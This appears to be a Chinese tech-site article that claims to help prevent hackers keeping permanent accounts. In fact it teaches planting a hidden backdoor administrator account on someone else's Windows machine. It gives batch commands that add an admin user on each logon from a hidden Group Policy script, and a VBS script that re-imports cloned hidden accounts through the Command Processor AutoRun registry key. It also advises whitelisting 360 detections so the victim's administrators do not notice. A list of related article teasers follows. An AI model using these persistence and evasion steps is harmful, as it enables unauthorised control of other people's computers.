防止黑客建立永久帐号的步骤 拦截重建账号的方法
windows下建立永久帐号方法,搞服务器安全的朋友也需要学习下,防止黑客建立永久帐号。
操作步骤:
1、在自己电脑里面建立一个.txt文本文件.
2、在里面输入内容:
@echo off
net user xixi 123456 /add 注释:前面xixi是用户名后面123456是密码;
net localgroup administrators xixi /add
3、把这个文件保存,更改后缀为xixi.bat 注释:前面名字随便,后面格式一定要是bat;
4、把这个文件拷贝到对方电脑C:\WINNT\system32\GroupPolicy\User\Scripts\Logon文件目录下,没有的话自己创建。别忘了将文件属性设为“隐藏”哦!
完成,下次对方电脑无论如何都有这个管理员帐号,删除了,下次启动还有!
如果把里面的内容改成:
@echo off
net user administrator 123456 /add
意思是不管你怎么改,下次启动管理员帐号administrator密码一直是123456
作者:xixi
逍遥复仇点评:以上应该对应的就是组策略里计算机管理中的“登录”和“注销”脚本,打开gpedit.msc找找看,听说此法360能检测出来,我是没有试,你可以先用360扫一下如果能查出来将其设为信任就OK了!
强调一下本文貌似要配合《安静运行批处理vbs脚本》才算是完美!既然都走到这里了《建立超级隐藏账号方法》这篇也一起看了吧!
另外一种命令行截持重建帐号的方法:
将已在注册中克隆好的帐号分别导出一份,比如"guest$.reg"和"0x3f5.reg"复制c:\windows\目录下,然后在同目录下建立一个cmd.vbs脚本内容如下:
On Error Resume Next
set yecha=wscript.createobject("wscript.shell")
yecha.run "regedit.exe /s guest$.reg",0
yecha.run "regedit.exe /s 0x3f5.reg",0
在注册表中这个项KEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun里AutoRun键值中输入我们的脚本路径就OK。
(这个项起的作用是打开CMD自动运行我们编辑好的脚本文件)
提示:360安全卫士能查的出来显示为“命令行截持”,TNND,我把它加入信任了就没事了,管理员神精了会天天翻360那个不起眼的地方?
整理作者:逍遥复仇
恶意程序:开发工具blackhole是怎么勒索的?
随着时代的发展,当代木马恶意软件的趋势并不仅仅是通过洪水般的广告让你电脑当机或者是偷取你的银行密码,而是会将你的电脑锁住,让你不能干任何事情,除非你交了“赎金”。最近流行的“勒索软件”首次发现是在a
详情2018-01-02 16:03:19责编:llp 来源:驱动管家电脑中毒的症状有哪些?电脑杀毒的方法是什么?
病毒感染的一些表现我们怎样知道电脑中病毒了呢?其实电脑中毒跟人生病一样,总会有一些明显的症状表现出来。例如机器运行十分缓慢、上不了网、杀毒软件生不了级、word文档打不开,电脑不能正常启动、硬盘分区找不
详情2018-01-21 12:35:37责编:llp 来源:驱动管家shell脚本怎么监控mysol服务器?shell脚本监控mysol服务器的步骤
监控MySQL服务是否正常,通常的思路为:检查3306端口是否启动,ps查看mysqld进程是否启动,命令行登录mysql执行语句返回结果,php或jsp程序检测(需要开发人员开发程序)等等;方法1:监听3306端口方法2:查看mys
详情2018-01-05 11:04:57责编:llp 来源:驱动管家路由器的功能是什么?家用路由器有哪些功能?
通信部门允许每个宽带用户使用两台电脑共享上网,这用户自己需要加装一个宽带路由器。那么,应该购买什么样的路由器才比较合适呢?现在的宽带路由器不少功能对于一般家庭用户来说确实非常实用,可以提高很多网络
详情2018-01-07 12:43:34责编:llp 来源:驱动管家脱壳教程 jdpack如何脱壳?
这是一个加壳软件,软件加壳后可以检测trw及sice,它的1 00版检测到trw或sice时只是提示,到了1 01版,检测到就会出现非法操作 未注册版好像没有时间限制,但是给软件加壳后每次运行就会提示 "Unregistered JDPack Thi
详情2018-01-19 09:35:00责编:llp 来源:驱动管家新的加用户方法:调用shell.users来加用户
一天,研究了一下用户控制面板文件nusrmgr cpl,发现调用的是Shell Users来加用户,它还同时调用了 wscript shell、Shell Application、Shell LocalMachine这三个组件 不过加用户的话,这一个 Shell Users就足够
详情2018-02-27 19:18:04责编:llp 来源:驱动管家什么是dns漏洞?模拟dns缓存毒药攻击的步骤
如果你访问大型知名网站打开的却是病毒网站,如果你访问网银的官方网站打开的却是假冒网银页面,如果访问的是正规网站打开的却是色情网站……这些情况听起来不可思议,输入的网址是正确的为什么打开的却是其他网
详情2018-02-07 10:01:55责编:llp 来源:驱动管家抓鸡教程 如何用非主流的方式抓鸡?
事先声明一下,其实这个是没有什么技术含量的,只是一个思路 第一步:找一个可以观看的SWF文件第二步:用 "SmartSWF EXE& 39;把这个SWF文件转换成EXE文件,当然也可以用其他的软件第三步:打开 "南域剑盟捆绑器2008正式版
详情2018-01-19 15:49:21责编:llp 来源:驱动管家mssql是什么?怎么利用mssql的sa权限?
MSSQL就是SQLSERVER,一般在windows平台上跟asp和asp net结合使用。MSSQL是一个数据库平台,提供数据库的从服务器到终端的完整的解决方案,其中数据库服务器部分,是一个数据库管理系统,用于建立、使用和维护数
详情2018-01-20 15:30:59责编:llp 来源:驱动管家工业控制系统有哪些潜在的风险?工业控制系统的安全防护设计
2010年10月发生在伊朗核电站的 "震网 "(Stuxnet)病毒,为工业生产控制系统安全敲响了警钟。现在,国内外生产企业都把工业控制系统安全防护建设提上了日程。本文在对工业控制系统特点和面临的安全风险进行分析的基
详情2018-01-24 17:20:14责编:llp 来源:驱动管家
- web应用漏洞的防御思路:用PHP扩展来完成阻断
- 多余的驱动程序认证能不能取消?怎样取消多余的驱动程序认证
- 拉拉qq助手有哪些功能?qq助手怎么使用
- 无穷符号能不能输入?MathType怎么输入无穷符号
- 华硕笔记本电池怎么拆解?拆解华硕笔记本电池的方法
- 摄像机电池怎么保养?摄像机电池的相关介绍
- 谷歌工程师:Flash使用率急速下降 多家浏览器限制Flash的播放
- 阿里云推出开年采购季活动 5折起 新购满额再返最高6000元
- window8的文件丢失有什么办法系统还原?
- win7系统电脑语音聊天的时候听不到声音怎么办
- 国民指纹手机中兴blade a1发布会讲了什么?
- 一加手机2好用吗?一加手机2的评测报告
- Win10预览版10532有哪些问题?Win10预览版已知问题汇总
- 阿里旺旺如何改密码 阿里旺旺修改密码方法步骤
- 评价神话webdav入侵难度 webdav漏洞说明
- 上传目录却取消了脚本执行的权限怎么办?
- 无线网卡驱动怎么安装?使用驱动精灵即可轻松搞定
- UG怎么使用样式扫掠的功能?UG样式扫掠的使用技巧
- 音乐处理软件goldwave能不能消除人声?goldwave消除人声教程
- 笔记本电脑的高能电池是怎么来的?怎么打造笔记本高能电池